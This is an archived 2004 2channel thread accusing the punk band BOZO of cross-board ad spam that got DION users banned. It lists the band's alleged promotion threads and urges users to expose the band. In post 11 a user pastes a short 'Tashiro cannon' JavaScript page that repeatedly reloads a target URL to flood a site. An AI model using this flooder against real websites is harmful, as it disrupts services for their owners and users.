2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【dionユーザー】マルチポストバンドBOZO【一時全鯖規制】

1 :名無しさん@おどらにゃソンソン:04/03/10 18:38 ID:/Xckg0JH
【自称パンクバンド・BOZOが自分自身でマルチポスト宣伝】
2ちゃんねるにおけるマルチポスト広告爆撃。初めはただの嫌がらせかと思っていました。
広告対策スレでFOX★が晒したDIONのリモートホスト。
そして、広告爆撃のリンク先にあったバンドスタッフのリモートホストもまたDIONでした。
そんな…自作自演なんて…すごく、見苦しいです…
パンクのくせにやってることはエロ業者と変わんないんだもんな…
発覚後、BOZO BBSにて猛抗議を受けているが、反省の色は無い。
BOZO 公式ホームページ
http://www.geocities.jp/lemonrecord/
BOZO BBS
http://8516.teacup.com/bozo/bbs
【lemonrecord】広告専用対策スレッド
http://qb3.2ch.net/test/read.cgi/sec2chd/1078166776/

2 :名無しさん@おどらにゃソンソン:04/03/10 18:38 ID:/Xckg0JH
◆簡単なまとめ◆

糞以下の自称パンクバンドが、2chの多くの板に対し
宣伝行為による荒らし的書き込みを展開。
(パンク板は一時期大変な状況だった)

広告対策スレでBOZOと判明。

全板広告宣伝無差別投稿として、BOZOが使っていた.ppp.dion.ne.jp
が2ch全サーバにて規制される。http://qb3.2ch.net/test/read.cgi/sec2ch/1047732753/109

dionの一般ユーザー、超迷惑

なぜかdion謝罪

3 :名無しさん@おどらにゃソンソン:04/03/10 18:38 ID:/Xckg0JH

2chネラーBOZOオフィのBBSにて謝罪を要求

一度dionからBOZO STAFFの名前で謝罪が書き込まれる。(しかしあとのレスの回答に困りすぐ自分でそれを消す)

BOZOサイドは自分らに都合の悪い書き込みを削除し続ける。(今回の事実に対する追及など。しかし荒らしAAなどは消さないまたBBSの停止再開を繰り返す

つまりBBSを訪れた他の人には「俺ら原因不明のBBS荒らしに会っているんだ!」とアピールしたいらしい。
イコール
他の人には隠蔽し勝手に被害者を勝手に装っている。

今もちゃんとした謝罪は無く現在に至る。ほとぼりが冷めれば風化すると思っている。
 
このような舐めた態度が許されるのでしょうか?これがPUNKというやつですか?
人に迷惑かけてもお構いなしですか?

4 :名無しさん@おどらにゃソンソン:04/03/10 18:56 ID:7RBbwelP
晒しあげ

5 :名無しさん@おどらにゃソンソン:04/03/10 19:00 ID:CJ6RayWf
<BOZO自演疑惑スレッド(おそらく殆ど自分で立てたもの)>

【緊急】BOZOをカラオケに入れよう!!【企画】
http://that.2ch.net/test/read.cgi/event/1067160304/

【緊急】BOZOをカラオケに入れよう!!【企画】
http://music3.2ch.net/test/read.cgi/karaok/1067160015/

【緊急】BOZOシュウヂをベストジーニストへ【企画】
http://that.2ch.net/test/read.cgi/event/1059255348/

★BOZO全国ツアーを2ちゃんねら−で満員にしよう★
http://off.2ch.net/test/read.cgi/offmatrix/1058689816/
★BOZO★
http://music.2ch.net/test/read.cgi/minor/1020401877/
http://music.2ch.net/minor/kako/1020/10204/1020401877.html

6 :名無しさん@おどらにゃソンソン:04/03/10 19:01 ID:CJ6RayWf
1 :名無しのエリー :03/07/20 18:49 ID:q3OGjyPg
8月27日発売BOZO 3rdアルバム『シルヴィアス』を2ちゃんねらーの力で
オリコン1位にしよう!!!
★BOZO 3rdアルバム『シルウ゛ィアス』2003.8.27発売決定!!(全14曲・\2100)
※初回プレス限定封入特典有
☆シルウ゛ィアス詳細☆
http://www.geocities.jp/lemonrecord/shiruviasu.html
2ちゃんねらーよ今こそ団結だCD SHOPへ予約急げ。
全国ツアーも2ちゃんねらーで満員にしょう。
ライブハウスに電話予約急げ


他人に任せすぎ
アホかガキがw

7 :名無しさん@おどらにゃソンソン:04/03/10 19:26 ID:r73w6IXt
【緊急】BOZO 3rdアルバムをオリコン1位へ【指令】
http://ex3.2ch.net/test/read.cgi/offevent/1058705485/ 03/07/20 21:51
http://ex3.2ch.net/test/read.cgi/offreg/1058705355/ 03/07/20 21:49
http://music2.2ch.net/test/read.cgi/hrhm/1058696068/ 03/07/20 19:14
http://music2.2ch.net/test/read.cgi/legend/1058705669/ 03/07/20 21:54
http://music2.2ch.net/test/read.cgi/minor/1058696450/ 03/07/20 19:20
http://music2.2ch.net/test/read.cgi/visual/1058696261/ 03/07/20 19:17
http://okazu.bbspink.com/test/read.cgi/ascii/1058705840/ 03/07/20 21:57
http://wow.bbspink.com/test/read.cgi/hneta/1058705968/ 03/07/20 21:59
(ほとんど削除済み)
○コピペ爆撃でオリコン1位になろうとするBOZO。

8 :名無しさん@おどらにゃソンソン:04/03/10 19:27 ID:r73w6IXt
このような発言がありましたので
http://music2.2ch.net/test/read.cgi/punk/1044792968/374

パンク板代表としてBOZOに出演して頂きたい。
バンド自身のHPに、いろんなイベントに呼んで下さいみたいなことが書いてありましたし。
ここのBBSに連絡先が書いてあります。
2ちゃんねるに電話番号とか住所を晒すのもなんですから…
1度見てやって下さい。

http://bozo1996.hp.infoseek.co.jp/

貼りまくれ!!

○自分でパンク板代表とか言い出すBOZO。

彼らはDQNバンド以外の何者でもない。

9 :名無しさん@おどらにゃソンソン:04/03/10 21:01 ID:q43sNdqt
そういえばココにも無かったか?

誰?と書いといたが、

10 :名無しさん@おどらにゃソンソン:04/03/10 23:58 ID:g2DEZEXB
>>9
被害は全板に及んでいます

11 :名無しさん@おどらにゃソンソン:04/03/11 00:55 ID:r0qcLLzF
ねぇ、これ何?

Interval<input type="text" name="ival" value="100"><input type="button" value="田代砲発射!" onClick="c();"><script type="text/JavaScript">
var tid;var ta=
"URLを入力"
;w=window.open(ta,'san','WIDTH=200,height=100');
function c(){
w.location=ta;
tid=setTimeout("c()",ival.value);
}
</script>

教えてエロイ人。

12 :名無しさん@おどらにゃソンソン:04/03/11 01:39 ID:bbPrnlmb
>>11
正直、サイト落としても意味無いと思う。
関係者にメールするのが1番効果的。

13 :名無しさん@おどらにゃソンソン:04/03/11 02:20 ID:7TU4FO0Y
残念ですが、現状では祭りchでやるほどの勢力は無いと思います。
本スレは http://news4.2ch.net/test/read.cgi/news/1078834739/ ですので、
よろしかったら合流してください。

14 :名無しさん@おどらにゃソンソン:04/03/11 02:54 ID:wMvizClt
祭りに持ってこいのネタなのにイマイチ盛り上がりに欠けるのは奴らが"正しい"2ch対策を取っているせいじゃない?
これには奴らの行為を分かりやすく2ch外に説明する事、徹底的に奴らを悪者にするしかないと思う。
現状ではなぜか2chサイドが悪者にされつつあるっぽいしね。

奴らの売名行為から察するに、世間の目を気にする小心者だと分かる。
世間一般に事実が伝われば奴らは必死に止めにくるんじゃない?
とは言っても普通の人にはBOZOなんてマイナーな集団は2ch以下の存在だろうけど‥

15 :名無しさん@おどらにゃソンソン:04/03/11 04:10 ID:7TU4FO0Y
>>14
そのためにはまとめサイトや適切に事件をまとめた回覧文などが必要なんですが、
中々それが集まらないんですよ。
普通ν速のスレではすぐに誰かがやるんだけど、ネタがパンクとかインディーズだから
年齢層が低いのかな。。。

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)